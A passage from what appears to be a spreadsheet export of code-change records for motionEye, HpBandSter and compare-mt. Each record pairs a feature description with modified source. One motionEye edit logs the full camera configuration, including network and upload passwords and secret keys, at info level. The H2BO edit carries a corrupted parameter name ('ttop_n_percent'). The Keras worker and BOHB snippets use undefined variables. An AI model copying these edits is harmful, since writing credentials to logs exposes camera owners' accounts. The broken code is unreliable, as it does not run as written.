utils.is_simple_mjpeg_camera(camera_config):\n            proto = \'mjpeg\'\n            url = camera_config.get(\'@url\', \'N/A\')\n            logging.info(\n                f\'Camera {camera_id} configuration loaded: name={camera_name}, enabled={enabled}, \'\n                f\'proto={proto}, url={url}, storage_device={storage_device}\'\n            )\n    except Exception as e:\n        logging.error(f\'Error logging camera configuration details for camera {camera_id}: {e}\')\n\n\n# File 2: motioneye/motioneye/handlers/relay_event.py - Modified post method\n\nclass RelayEventHandler(BaseHandler):\n    @BaseHandler.auth(admin=True)\n    def post(self):\n        event = self.get_argument(\'event\')\n        motion_camera_id = int(self.get_argument(\'motion_camera_id\'))\n\n        camera_id = motionctl.motion_camera_id_to_camera_id(motion_camera_id)\n        if camera_id is None:\n            logging.debug(\n                \'ignoring event for unknown motion camera id %s\' % motion_camera_id\n            )\n            return self.finish_json()\n\n        else:\n            logging.debug(\n                \'received relayed event {event} for motion camera id {id} (camera id {cid})\'.format(\n                    event=event, id=motion_camera_id, cid=camera_id\n                )\n            )\n\n        #Modify - Fetch camera configuration which will now log configuration details\n        camera_config = config.get_camera(camera_id)\n        if camera_config is None:\n            logging.warning(f\'camera configuration not found for camera id {camera_id}\')\n            return self.finish_json()\n\n        if not utils.is_local_motion_camera(camera_config):\n            logging.warning(\n                \'ignoring event for non-local camera with id %s\' % camera_id\n            )\n            return self.finish_json()\n\n        if event == \'start\':\n            if not camera_config[\'@motion_detection\']:\n                logging.debug(\n                    \'ignoring start event for camera with id %s and motion detection disabled\'\n                    % camera_id\n                )\n                return self.finish_json()\n\n            motionctl.set_motion_detected(camera_id, True)\n\n        elif event == \'stop\':\n            motionctl.set_motion_detected(camera_id, False)\n\n        elif event == \'movie_end\':\n            filename = self.get_argument(\'filename\')\n\n            # generate preview (thumbnail)\n            tasks.add(\n                5,\n                mediafiles.make_movie_preview,\n                tag=\'make_movie_preview(%s)\' % filename,\n                camera_config=camera_config,\n                full_path=filename,\n            )\n\n            # upload to external service\n            if camera_config[\'@upload_enabled\'] and camera_config[\'@upload_movie\']:\n                self.upload_media_file(filename, camera_id, camera_config)\n\n        elif event == \'picture_save\':\n            filename = self.get_argument(\'filename\')\n\n            # upload to external service\n            if camera_config[\'@upload_enabled\'] and camera_config[\'@upload_picture\']:\n                self.upload_media_file(filename, camera_id, camera_config)\n\n        else:\n            logging.warning(\'unknown event %s\' % event)\n\n        self.finish_json()\n\n    def upload_media_file(self, filename, camera_id, camera_config):\n        service_name = camera_config[\'@upload_service\']\n\n        tasks.add(\n            5,\n            uploadservices.upload_media_file,\n            tag=\'upload_media_file(%s)\' % filename,\n            camera_id=camera_id,\n            service_name=service_name,\n            camera_name=camera_config[\'camera_name\'],\n            target_dir=camera_config[\'@upload_subfolders\']\n            and camera_config[\'target_dir\'],\n            filename=filename,\n        )'}</t>
  </si>
  <si>
    <t>{'#file 1': "def get_camera(camera_id, as_lines=False):\n    if not as_lines and camera_id in _camera_config_cache:\n        return _camera_config_cache[camera_id]\n\n    camera_config_path = os.path.join(settings.CONF_PATH, _CAMERA_CONFIG_FILE_NAME) % {\n        'id': camera_id\n    }\n\n    logging.debug(f'reading camera config from {camera_config_path}...')\n\n    try:\n        f = open(camera_config_path)\n\n    except Exception as e:\n        logging.error(f'could not open camera config file: {str(e)}')\n\n        raise\n\n    try:\n        lines = [line.strip() for line in f.readlines()]\n\n    except Exception as e:\n        logging.error(f'could not read camera config file {camera_config_path}: {e}')\n\n        raise\n\n    finally:\n        f.close()\n\n    if as_lines:\n        return lines\n\n    camera_config = _conf_to_dict(\n        lines,\n        no_convert=[\n            '@network_share_name',\n            '@network_smb_ver',\n            '@network_server',\n            '@network_username',\n            '@network_password',\n            '@storage_device',\n            '@upload_server',\n            '@upload_username',\n            '@upload_password',\n            '@upload_endpoint_url',\n            '@upload_access_key',\n            '@upload_secret_key',\n            '@upload_bucket',\n            'camera_name',\n        ],\n    )\n\n    if utils.is_local_motion_camera(camera_config):\n        # determine the enabled status\n        main_config = get_main()\n        cameras = main_config.get('camera', [])\n        camera_config['@enabled'] = (\n            _CAMERA_CONFIG_FILE_NAME % {'id': camera_id} in cameras\n        )\n        camera_config['@id'] = camera_id\n\n        # adapt directives for motion versions &lt; 4.2 and &gt; 4.3\n        adapt_config_directives(camera_config, _MOTION_41_TO_43_OPTIONS_MAPPING)\n        adapt_config_directives(camera_config, _MOTION_44_TO_43_OPTIONS_MAPPING)\n\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_motion_camera(camera_id, camera_config)\n\n    elif utils.is_remote_camera(camera_config):\n        pass\n\n    elif utils.is_simple_mjpeg_camera(camera_config):\n        _get_additional_config(camera_config, camera_id=camera_id)\n\n        _set_default_simple_mjpeg_camera(camera_id, camera_config)\n\n    else:  # incomplete configuration\n        logging.warning(\n            f'camera config file at {camera_config_path} is incomplete, ignoring'\n        )\n\n        return None\n\n    _camera_config_cache[camera_id] = dict(camera_config)\n\n    #Modify: Log camera configuration details\n    logging.info(f'Fetched camera config for camera ID {camera_id}: {camera_config}')\n\n    return camera_config", '#file 2': "camera_id = motionctl.motion_camera_id_to_camera_id(motion_camera_id)\n        if camera_id is None:\n            logging.debug(\n                'ignoring event for unknown motion camera id %s' % motion_camera_id\n            )\n            return self.finish_json()\n\n        else:\n            logging.debug(\n                'received relayed event {event} for motion camera id {id} (camera id {cid})'.format(\n                    event=event, id=motion_camera_id, cid=camera_id\n                )\n            )\n\n        camera_config = config.get_camera(camera_id)\n        if not utils.is_local_motion_camera(camera_config):\n            logging.warning(\n                'ignoring event for non-local camera with id %s' % camera_id\n            )\n            return self.finish_json()", '#file 3': "def get_camera_ids(filter_valid=True):\n    global _camera_ids_cache\n\n    if _camera_ids_cache is not None:\n        return _camera_ids_cache\n\n    config_path = settings.CONF_PATH\n\n    logging.debug(f'listing config dir {config_path}...')\n\n    try:\n        ls = os.listdir(config_path)\n\n    except Exception as e:\n        logging.error(f'failed to list config dir {config_path}: {e}')\n\n        raise\n\n    camera_ids = []\n\n    pattern = '^' + _CAMERA_CONFIG_FILE_NAME.replace('%(id)s', r'(d+)') + '$'\n    for name in ls:\n        _match = match(pattern, name)\n        if _match:\n            camera_id = int(_match.groups()[0])\n            logging.debug(f'found camera with id {camera_id}')\n\n            camera_ids.append(camera_id)\n\n    camera_ids.sort()\n\n    if not filter_valid:\n        return camera_ids\n\n    filtered_camera_ids = []\n    for camera_id in camera_ids:\n        if get_camera(camera_id):\n            filtered_camera_ids.append(camera_id)\n\n    _camera_ids_cache = filtered_camera_ids\n\n    return filtered_camera_ids", '#file 4': "def get_enabled_local_motion_cameras():\n    if not get_main().get('@enabled'):\n        return []\n\n    camera_ids = get_camera_ids()\n    cameras = [get_camera(camera_id) for camera_id in camera_ids]\n    return [c for c in cameras if c.get('@enabled') and utils.is_local_motion_camera(c)]"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'H2BO class in h2bo.py (config_generators) - specifically the __init__ method and new_result method', 'invoking_code_segment': 'H2BO class in h2bo.py (optimizers) - specifically the __init__ method that instantiates CG_H2BO and the get_next_iteration method', 'feature_description': 'Add a feature to log intermediate results during the optimization process. This includes adding a result_logger parameter to track configurations, losses, and budgets in real-time, enabling users to monitor optimization progress without waiting for completion.', 'modified_complete_code': '# File 1: HpBandSter/hpbandster/optimizers/config_generators/h2bo.py\n\nimport logging\nfrom copy import deepcopy\nimport traceback\nimport json\nimport os\nfrom datetime import datetime\n\nimport ConfigSpace\nimport ConfigSpace.hyperparameters\nimport ConfigSpace.util\nimport numpy as np\nimport scipy.stats as sps\n\nfrom hpbandster.core.base_config_generator import base_config_generator\nfrom hpbandster.optimizers.kde.mvkde import MultivariateKDE\n\nclass H2BO(base_config_generator):\n\tdef __init__(self, configspace, min_points_in_model = None,\n\t\t\t\t top_n_percent=15, num_samples = 64, random_fraction=1/3,\n\t\t\t\t min_bandwidth=1e-3, bw_estimator=\'scott\', fully_dimensional=True,\n\t\t\t\t result_logger=None,  #New: Add result_logger parameter\n\t\t\t\t **kwargs):\n\t\t"""\n\t\t\tFits for each given budget a kernel density estimator on the best N percent of the\n\t\t\tevaluated configurations on this budget.\n\n\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\tconfigspace: ConfigSpace\n\t\t\t\tConfiguration space object\n\t\t\ttop_n_percent: int\n\t\t\t\tDetermines the percentile of configurations that will be used as training data\n\t\t\t\tfor the kernel density estimator, e.g if set to 10 the 10% best configurations will be considered\n\t\t\t\tfor training.\n\t\t\tmin_points_in_model: int\n\t\t\t\tminimum number of datapoints needed to fit a model\n\t\t\tnum_samples: int\n\t\t\t\tnumber of samples drawn to optimize EI via sampling\n\t\t\trandom_fraction: float\n\t\t\t\tfraction of random configurations returned\n\t\t\tbw_estimator: string\n\t\t\t\thow the bandwidths is estimated. Possible values are \'scott\' and \'mlcv\' for maximum likelihood estimation\n\t\t\tmin_bandwidth: float\n\t\t\t\tto keep diversity, even when all (good) samples have the same value for one of the parameters,\n\t\t\t\ta minimum bandwidth (Default: 1e-3) is used instead of zero. \n\t\t\tfully_dimensional: bool\n\t\t\t\tif true, the KDE is uses factored kernel across all dimensions, otherwise the PDF is a product of 1d PDFs\n\t\t\tresult_logger: callable  #New: Document result_logger parameter\n\t\t\t\tOptional function to log intermediate results during optimization\n\n\t\t"""\n\t\tsuper().__init__(**kwargs)\n\t\tself.top_n_percent=top_n_percent\n\t\tself.configspace = configspace\n\t\tself.bw_estimator = bw_estimator\n\t\tself.min_bandwidth = min_bandwidth\n\t\tself.fully_dimensional = fully_dimensional\n\t\tself.result_logger = result_logger  #New: Store result_logger\n\n\t\tself.min_points_in_model = min_points_in_model\n\t\tif min_points_in_model is None:\n\t\t\tself.min_points_in_model = len(self.configspace.get_hyperparameters())+1\n\t\t\n\t\tself.num_samples = num_samples\n\t\tself.random_fraction = random_fraction\n\n\t\tself.configs = dict()\n\t\tself.losses = dict()\n\t\tself.good_config_rankings = dict()\n\t\tself.kde_models = dict()\n\n\n\tdef largest_budget_with_model(self):\n\t\tif len(self.kde_models) == 0:\n\t\t\treturn(-np.inf)\n\t\treturn(max(self.kde_models.keys()))\n\n\tdef get_config(self, budget):\n\t\t"""\n\t\t\tFunction to sample a new configuration\n\n\t\t\tThis function is called inside Hyperband to query a new configuration\n\n\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\tbudget: float\n\t\t\t\tthe budget for which this configuration is scheduled\n\n\t\t\treturns: config\n\t\t\t\tshould return a valid configuration\n\n\t\t"""\n\t\tsample = None\n\t\tinfo_dict = {}\n\t\t\n\t\t# If no model is available, sample from prior\n\t\t# also mix in a fraction of random configs\n\t\tif len(self.kde_models.keys()) == 0 or np.random.rand() &lt; self.random_fraction:\n\t\t\tsample =  self.configspace.sample_configuration()\n\t\t\tinfo_dict[\'model_based_pick\'] = False\n\n\n\t\tif sample is None:\n\t\t\ttry:\n\t\t\t\tsamples = self.kde_models[budget][\'good\'].sample(self.num_samples)\n\t\t\t\tei = self.kde_models[budget][\'good\'].pdf(samples)/self.kde_models[budget][\'bad\'].pdf(samples)\n\t\t\t\t\n\t\t\t\tbest_idx = np.argmax(ei)\n\t\t\t\tbest_vector = samples[best_idx]\n\n\t\t\t\tsample = ConfigSpace.Configuration(self.configspace, vector=best_vector)\n\n\n\t\t\t\tsample = ConfigSpace.util.deactivate_inactive_hyperparameters(\n\t\t\t\t\t\t\tconfiguration_space=self.configspace,\n\t\t\t\t\t\t\tconfiguration=sample.get_dictionary()\n\t\t\t\t\t\t\t)\n\t\t\t\tinfo_dict[\'model_based_pick\'] = True\n\n\t\t\texcept Exception as e:\n\t\t\t\tself.logger.warning(("="*50 + "\\n")*3 +\\\n\t\t\t\t\t\t"Error sampling a configuration!\\n"+\\\n\t\t\t\t\t\t"Models for budgets: %s"%(self.kde_models.keys()) +\\\n\t\t\t\t\t\t"\\n here is a traceback:" +\\\n\t\t\t\t\t\ttraceback.format_exc())\n\n\t\t\t\tfor b,l in self.losses.items():\n\t\t\t\t\tself.logger.debug("budget: {}\\nlosses:{}".format(b,l))\n\t\t\t\t\n\t\t\t\tsample =  self.configspace.sample_configuration()\n\t\t\t\tinfo_dict[\'model_based_pick\'] = False\n\t\t\t\n\t\treturn sample.get_dictionary(), info_dict\n\n\tdef impute_conditional_data(self, array):\n\n\t\treturn_array = np.empty_like(array)\n\n\t\tfor i in range(array.shape[0]):\n\t\t\tdatum = np.copy(array[i])\n\t\t\tnan_indices = np.argwhere(np.isnan(datum)).flatten()\n\n\t\t\twhile (np.any(nan_indices)):\n\t\t\t\tnan_idx = nan_indices[0]\n\t\t\t\tvalid_indices = np.argwhere(np.isfinite(array[:,nan_idx])).flatten()\n\n\t\t\t\tif len(valid_indices) &gt; 0:\n\t\t\t\t\t# pick one of them at random and overwrite all NaN values\n\t\t\t\t\trow_idx = np.random.choice(valid_indices)\n\t\t\t\t\tdatum[nan_indices] = array[row_idx, nan_indices]\n\n\t\t\t\telse:\n\t\t\t\t\t# no good point in the data has this value activated, so fill it with a valid but random value\n\t\t\t\t\tt = self.vartypes[nan_idx]\n\t\t\t\t\tif t == 0:\n\t\t\t\t\t\tdatum[nan_idx] = np.random.rand()\n\t\t\t\t\telse:\n\t\t\t\t\t\tdatum[nan_idx] = np.random.randint(t)\n\n\t\t\t\tnan_indices = np.argwhere(np.isnan(datum)).flatten()\n\t\t\treturn_array[i,:] = datum\n\t\treturn(return_array)\n\n\tdef new_result(self, job, update_model=True):\n\t\t"""\n\t\t\tfunction to register finished runs\n\n\t\t\tEvery time a run has finished, this function should be called\n\t\t\tto register it with the result logger. If overwritten, make\n\t\t\tsure to call this method from the base class to ensure proper\n\t\t\tlogging.\n\n\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\tjob: hpbandster.distributed.dispatcher.Job object\n\t\t\t\tcontains all the info about the run\n\t\t"""\n\n\t\tsuper().new_result(job)\n\n\t\tif job.result is None:\n\t\t\t# One could skip crashed results, but we decided \n\t\t\t# assign a +inf loss and count them as bad configurations\n\t\t\tloss = np.inf\n\t\telse:\n\t\t\tloss = job.result["loss"]\n\n\t\tbudget = job.kwargs["budget"]\n\n\t\tif budget not in self.configs.keys():\n\t\t\tself.configs[budget] = []\n\t\t\tself.losses[budget] = []\n\t\n\t\t\t\n\t\tif len(self.configs.keys()) == 1:\n\t\t\tmin_num_points = 6\n\t\telse:\n\t\t\tmin_num_points = self.min_points_in_model\n\n\n\t\t# skip model building if we already have a bigger model\n\t\tif max(list(self.kde_models.keys()) + [-np.inf]) &gt; budget:\n\t\t\treturn\n\n\t\t# We want to get a numerical representation of the configuration in the original space\n\n\t\tconf = ConfigSpace.Configuration(self.configspace, job.kwargs["config"]).get_array().tolist()\n\t\t\n\t\t\t\n\t\tif conf in self.configs[budget]:\n\t\t\ti = self.configs[budget].index(conf)\n\t\t\tself.losses[budget][i].append(loss)\n\t\t\tprint(\'-\'*50)\n\t\t\tprint(\'ran config %s with loss %f again\'%(conf, loss))\n\t\telse:\n\t\t\tself.configs[budget].append(conf)\n\t\t\tself.losses[budget].append([loss])\n\n\t\t\n\t\t# skip model building:\n\t\t#\t\ta) if not enough points are available\n\t\t\n\t\ttmp = np.array([np.mean(r) for r in self.losses[budget]])\n\t\tif np.sum(np.isfinite(tmp)) &lt; min_num_points:\n\t\t\tself.logger.debug("Only %i successful run(s) for budget %f available, need more than %s -&gt; can\'t build model!"%(np.sum(np.isfinite(tmp)), budget, min_num_points))\n\t\t\t#New: Log intermediate result even if model not built\n\t\t\tif self.result_logger is not None:\n\t\t\t\tself._log_result(job, budget, loss)\n\t\t\treturn\n\n\t\t#\t\tb) during warnm starting when we feed previous results in and only update once\n\t\tif not update_model:\n\t\t\treturn\n\n\t\tif budget not in self.kde_models.keys():\n\t\t\tself.kde_models[budget] = {\n\t\t\t\t\'good\': MultivariateKDE(self.configspace, min_bandwidth=self.min_bandwidth, fully_dimensional=self.fully_dimensional),\n\t\t\t\t\'bad\' : MultivariateKDE(self.configspace, min_bandwidth=self.min_bandwidth, fully_dimensional=self.fully_dimensional)\n\t\t\t}\t\n\n\n\t\tnum_configs = len(self.losses[budget])\n\t\t\n\t\ttrain_configs = np.array(self.configs[budget][-num_configs:])\n\t\ttrain_losses =  np.array(list(map(np.mean, self.losses[budget][-num_configs:])))\n\n\t\tn_good= max(3,(num_configs * self.top_n_percent) // 100)\n\t\tn_bad = num_configs-n_good\n\n\t\t# Refit KDE for the current budget\n\t\tidx = np.argsort(train_losses)\n\n\t\ttrain_data_good = self.impute_conditional_data(train_configs[idx[:n_good]])\n\t\ttrain_data_bad  = self.impute_conditional_data(train_configs[idx[n_good:n_good+n_bad+1]])\n\n\n\t\tself.kde_models[budget][\'bad\'].fit(train_data_bad, bw_estimator=self.bw_estimator)\n\t\tself.kde_models[budget][\'good\'].fit(train_data_good, bw_estimator=self.bw_estimator)\n\t\t\n\t\t\n\t\tif self.bw_estimator in [\'mlcv\'] and n_good &lt; 3:\n\t\t\tself.kde_models[budget][\'good\'].bandwidths[:] = self.kde_models[budget][\'bad\'].bandwidths\n\n\t\t# update probs for the categorical parameters for later sampling\n\t\tself.logger.debug(\'done building a new model for budget %f based on %i/%i split\\nBest loss for this budget:%f\\n\\n\\n\\n\\n\'%(budget, n_good, n_bad, np.min(train_losses)))\n\t\t\n\t\t#New: Log intermediate result after model update\n\t\tif self.result_logger is not None:\n\t\t\tself._log_result(job, budget, loss, n_good, n_bad, np.min(train_losses))\n\n\t#New: Helper method to log results\n\tdef _log_result(self, job, budget, loss, n_good=None, n_bad=None, best_loss=None):\n\t\t"""\n\t\t\tLog intermediate optimization results\n\t\t\t\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\tjob: Job object\n\t\t\t\tThe job that was completed\n\t\t\tbudget: float\n\t\t\t\tThe budget for this job\n\t\t\tloss: float\n\t\t\t\tThe loss value\n\t\t\tn_good: int\n\t\t\t\tNumber of good configurations\n\t\t\tn_bad: int\n\t\t\t\tNumber of bad configurations\n\t\t\tbest_loss: float\n\t\t\t\tBest loss found so far\n\t\t\t"""\n\t\ttry:\n\t\t\tresult_dict = {\n\t\t\t\t\'timestamp\': datetime.now().isoformat(),\n\t\t\t\t\'budget\': budget,\n\t\t\t\t\'loss\': float(loss) if np.isfinite(loss) else \'inf\',\n\t\t\t\t\'config\': job.kwargs.get(\'config\', {}),\n\t\t\t\t\'job_id\': job.id if hasattr(job, \'id\') else None,\n\t\t\t}\n\t\t\tif n_good is not None:\n\t\t\t\tresult_dict[\'n_good\'] = n_good\n\t\t\tif n_bad is not None:\n\t\t\t\tresult_dict[\'n_bad\'] = n_bad\n\t\t\tif best_loss is not None:\n\t\t\t\tresult_dict[\'best_loss\'] = float(best_loss)\n\t\t\t\n\t\t\tself.result_logger(result_dict)\n\t\texcept Exception as e:\n\t\t\tself.logger.warning(f"Failed to log result: {str(e)}")\n\n\n# File 2: HpBandSter/hpbandster/optimizers/h2bo.py\n\nimport os\nimport time\nimport math\nimport copy\nimport logging\nimport json\nfrom datetime import datetime\n\nimport numpy as np\n\n\nimport ConfigSpace as CS\n\nfrom hpbandster.core.master import Master\nfrom hpbandster.optimizers.iterations import SuccessiveHalving\nfrom hpbandster.optimizers.config_generators.h2bo import H2BO as CG_H2BO\n\nclass H2BO(Master):\n\tdef __init__(self,\n\t\t\t\tconfigspace = None,\n\t\t\t\teta=3, min_budget=0.01, max_budget=1,\n\t\t\t\tmin_points_in_model = None,\tttop_n_percent=15,\n\t\t\t\tnum_samples = 32, random_fraction=1/3, bandwidth_factor=1,\n\t\t\t\tmin_bandwidth=1e-3,bw_estimator=\'scott\',fully_dimensional=True,\n\t\t\t\tresult_logger=None,  #New: Add result_logger parameter\n\t\t\t\t**kwargs\n\t\t\t\t):\n\t\t"""\n\n\t\tParameters\n\t\t----------\n\t\tconfigspace: ConfigSpace object\n\t\t\tvalid representation of the search space\n\t\teta : float\n\t\t\tIn each iteration, a complete run of sequential halving is executed. In it,\n\t\t\tafter evaluating each configuration on the same subset size, only a fraction of\n\t\t\t1/eta of them \'advances\' to the next round.\n\t\t\tMust be greater or equal to 2.\n\t\tmin_budget : float\n\t\t\tThe smallest budget to consider. Needs to be positive!\n\t\tmax_budget : float\n\t\t\tthe largest budget to consider. Needs to be larger than min_budget!\n\t\t\tThe budgets will be geometrically distributed $\\sim \\eta^k$ for\n\t\t\t$k\\in [0, 1, ... , num_subsets - 1]$.\n\t\tmin_points_in_model: int\n\t\t\tnumber of observations to start building a KDE. Default \'None\' means\n\t\t\tdim+1, the bare minimum.\n\t\ttop_n_percent: int\n\t\t\tpercentage ( between 1 and 99, default 15) of the observations that are considered good.\n\t\tnum_samples: int\n\t\t\tnumber of samples to optimize EI (default 64)\n\t\trandom_fraction: float\n\t\t\tfraction of purely random configurations that are sampled from the\n\t\t\tprior without the model.\n\t\tbw_estimator: str\n\t\t\tcontrols the way the bandwidths are estimator. For \'scott\' a quick rule of thumb based\n\t\t\ton the empirical variance is used, for \'mlvc\' the likelihood based on \n\t\t\tleave on out cross validation is maximized.\n\t\tmin_bandwidth: float\n\t\t\tto keep diversity, even when all (good) samples have the same value for one of the parameters,\n\t\t\ta minimum bandwidth (Default: 1e-3) is used instead of zero. \n\t\titeration_kwargs: dict\n\t\t\tkwargs to be added to the instantiation of each iteration\n\t\tfully_dimensional: bool\n\t\t\tif true, the KDE is uses factored kernel across all dimensions, otherwise the PDF is a product of 1d PDFs\n\t\tresult_logger: callable  #New: Document result_logger parameter\n\t\t\tOptional function to log intermediate results during optimization\n\t\t"""\n\n\t\t# TODO: Propper check for ConfigSpace object!\n\t\tif configspace is None:\n\t\t\traise ValueError("You have to provide a valid CofigSpace object")\n\n\t\t#Modify: Pass result_logger to CG_H2BO\n\t\tcg = CG_H2BO( configspace = configspace,\n\t\t\t\t\tmin_points_in_model = min_points_in_model,\n\t\t\t\t\ttop_n_percent=top_n_percent,\n\t\t\t\t\tnum_samples = num_samples,\n\t\t\t\t\trandom_fraction=random_fraction,\n\t\t\t\t\tbw_estimator=bw_estimator,\n\t\t\t\t\tmin_bandwidth = min_bandwidth,\n\t\t\t\t\tfully_dimensional=fully_dimensional,\n\t\t\t\t\tresult_logger=result_logger  #New: Pass result_logger\n\t\t\t\t\t)\n\n\t\tsuper().__init__(config_generator=cg, **kwargs)\n\n\t\t# Hyperband related stuff\n\t\tself.eta = eta\n\t\tself.min_budget = min_budget\n\t\tself.max_budget = max_budget\n\t\tself.result_logger = result_logger  #New: Store result_logger\n\t\t\n\t\t\n\t\t# precompute some HB stuff\n\t\tself.max_SH_iter = -int(np.log(min_budget/max_budget)/np.log(eta)) + 1\n\t\tself.budgets = max_budget * np.power(eta, -np.linspace(self.max_SH_iter-1, 0, self.max_SH_iter))\n\n\t\t# max total budget for one iteration\n\t\tself.budget_per_iteration = sum([b*self.eta**i for i, b in enumerate(self.budgets[::-1])])\n\t\t\n\t\tself.config.update({\n\t\t\t\t\t\t\t\'eta\'        : eta,\n\t\t\t\t\t\t\t\'min_budget\' : min_budget,\n\t\t\t\t\t\t\t\'max_budget\' : max_budget,\n\t\t\t\t\t\t\t\'budgets\'    : self.budgets,\n\t\t\t\t\t\t\t\'max_SH_iter\': self.max_SH_iter,\n\t\t\t\t\t\t\t\'min_points_in_model\' : min_points_in_model,\n\t\t\t\t\t\t\t\'top_n_percent\' : top_n_percent,\n\t\t\t\t\t\t\t\'num_samples\' : num_samples,\n\t\t\t\t\t\t\t\'random_fraction\' : random_fraction,\n\t\t\t\t\t\t\t\'min_bandwidth\': min_bandwidth,\n\t\t\t\t\t\t\t\'bw_estimator\': bw_estimator,\n\t\t\t\t\t\t\t\'fully_dimensional\': fully_dimensional,\n\t\t\t\t\t\t\t\'result_logger\': result_logger is not None,  #New: Log if result_logger is enabled\n\t\t\t\t\t\t})\n\n\tdef get_next_iteration(self, iteration, iteration_kwargs={}):\n\t\t"""\n\t\t\tBO-HB uses (just like Hyperband) SuccessiveHalving for each iteration.\n\t\t\tSee Li et al. (2016) for reference.\n\t\t\t\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\t\titeration: int\n\t\t\t\t\tthe index of the iteration to be instantiated\n\n\t\t\tReturns:\n\t\t\t--------\n\t\t\t\tSuccessiveHalving: the SuccessiveHalving iteration with the\n\t\t\t\t\tcorresponding number of configurations\n\t\t"""\n\t\t\n\t\tmin_budget = max( self.min_budget, self.config_generator.largest_budget_with_model())\n\t\tmax_budget = self.max_budget\n\t\teta = self.eta\n\n\t\t# precompute some HB stuff\n\t\tmax_SH_iter = -int(np.log(min_budget/max_budget)/np.log(eta)) + 1\n\t\tbudgets = max_budget * np.power(eta, -np.linspace(max_SH_iter-1, 0, max_SH_iter))\n\n\t\t\n\t\t# number of \'SH rungs\'\n\t\ts = max_SH_iter - 1\n\t\t# number of configurations in that bracket\n\t\tn0 = int(np.floor((self.max_SH_iter)/(s+1)) * eta**s)\n\t\tns = np.array([max(int(n0*(eta**(-i))), 1) for i in range(s+1)])\n\t\t\n\t\twhile (ns * budgets[-s-1:]).sum() &lt;= self.budget_per_iteration:\n\t\t    n0 += 1\n\t\t    ns = np.array([max(int(n0*(eta**(-i))), 1) for i in range(s+1)])\n\t\t\n\t\tn0 -= 1\n\t\tns = np.array([max(int(n0*(eta**(-i))), 1) for i in range(s+1)])\n\t\t\n\t\tassert (ns * budgets[-s-1:]).sum() &lt;= self.budget_per_iteration, \'Sampled iteration exceeds the budget per iteration!\'\n\t\t\n\t\treturn(SuccessiveHalving(HPB_iter=iteration, num_configs=ns, budgets=budgets, config_sampler=self.config_generator.get_config, **iteration_kwargs))\n\n\t#New: Helper method to create a default result logger\n\t@staticmethod\n\tdef create_result_logger(directory=None):\n\t\t"""\n\t\t\tCreate a simple result logger function that writes to a JSON file\n\t\t\t\n\t\t\tParameters:\n\t\t\t-----------\n\t\t\tdirectory: str\n\t\t\t\tDirectory to save results. If None, uses current directory\n\t\t\t\n\t\t\tReturns:\n\t\t\t--------\n\t\t\tcallable: A function that can be used as result_logger\n\t\t\t"""\n\t\tif directory is None:\n\t\t\tdirectory = \'.\'\n\t\t\n\t\tif not os.path.exists(directory):\n\t\t\tos.makedirs(directory)\n\t\t\n\t\tresults_file = os.path.join(directory, \'h2bo_results.json\')\n\t\t\n\t\tdef logger(result_dict):\n\t\t\ttry:\n\t\t\t\twith open(results_file, \'a\') as f:\n\t\t\t\t\tjson.dump(result_dict, f)\n\t\t\t\t\tf.write(\'\\n\')\n\t\t\texcept Exception as e:\n\t\t\t\tprint(f"Error writing to results file: {str(e)}")\n\t\t\n\t\treturn logger'}</t>
  </si>
  <si>
    <t>{'example_5_keras_worker.py': "#Modify\nclass KerasWorker(Worker):\n    def compute(self, config, budget, **kwargs):\n        # Implementation of the compute method for KerasWorker\n        # New: Add logging for intermediate results\n        self.logger.info(f'Intermediate result: {intermediate_result}')\n        return({'loss': loss, 'info': info})", 'example_5_mnist.py': "#Modify\nif args.backend == 'pytorch':\n    from example_5_pytorch_worker import PyTorchWorker as worker\nelse:\n    from example_5_keras_worker import KerasWorker as worker\n\n# New: Add logging for intermediate results\nresult_logger = hpres.json_result_logger(directory=args.shared_directory, overwrite=False)\n\n# Start a nameserver:\nNS = hpns.NameServer(run_id=args.run_id, host=host, port=0, working_directory=args.shared_directory)\nns_host, ns_port = NS.start()\n\n# Start local worker\nw = worker(run_id=args.run_id, host=host, nameserver=ns_host, nameserver_port=ns_port, timeout=120)\nw.run(background=True)\n\n# Run an optimizer\nbohb = BOHB(  configspace = worker.get_configspace(),\n              run_id = args.run_id,\n              host=host,\n              nameserver=ns_host,\n              nameserver_port=ns_port,\n              result_logger=result_logger,\n              min_budget=args.min_budget, max_budget=args.max_budget, \n           )\nres = bohb.run(n_iterations=args.n_iterations)\n\n# store results\nwith open(os.path.join(args.shared_directory, 'results.pkl'), 'wb') as fh:\n    pickle.dump(res, fh)\n\n# shutdown\nbohb.shutdown(shutdown_workers=True)\nNS.shutdown()", 'example_5_pytorch_worker.py': '# No modifications needed for PyTorchWorker as the feature is specific to KerasWorker.', 'hpbandster/optimizers/bohb.py': "#Modify\ndef run(self, n_iterations):\n    # Existing code for running the optimizer\n    # New: Handle intermediate results logging\n    for iteration in range(n_iterations):\n        # Existing iteration logic\n        # New: Log intermediate results\n        self.result_logger.info(f'Iteration {iteration} intermediate results: {intermediate_results}')"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def cache_stats(self, ref, out, src=None) in class BleuScorer, SacreBleuScorer, WERScorer, METEORScorer, and other scorer classes; def calc_statistics(self, ref, outs, ...) and def calc_bucket_details(...) in bucketer classes', 'invoking_code_segment': 'def generate_score_report(...), def generate_word_accuracy_report(...), def generate_src_word_accuracy_report(...), def generate_sentence_bucketed_report(...) in compare_mt_main.py', 'feature_description': 'Add a new feature to cache and reuse statistics for faster computation of scores and bucket details. This feature allows caching of intermediate computation results (such as n-gram statistics, edit distances, and bucket calculations) so that when the same data is processed again, the cached results can be reused instead of recomputing from scratch. The caching mechanism uses dictionary-based storage with cache keys to identify and retrieve cached statistics, significantly improving performance for repeated analyses.', 'modified_complete_code': '# File: compare-mt/compare_mt/scorers.py\n# Modify cache_stats methods to support persistent caching\n\nclass BleuScorer(Scorer):\n  # ... existing code ...\n  \n  def cache_stats(self, ref, out, src=None):\n    """\n    Cache sufficient statistics for caculating BLEU score\n    #Modify: Added cache_id parameter for persistent caching\n    Args:\n      ref: A reference corpus\n      out: An output corpus\n      src: A source courpus. Ignored if passed\n      cache_id: Optional identifier for caching results\n    Returns:\n      A list of cached statistics\n    """\n    if self.case_insensitive:\n      ref = corpus_utils.lower(ref)\n      out = corpus_utils.lower(out)\n\n    cached_stats = []\n\n    for r, o in zip(ref, out):\n     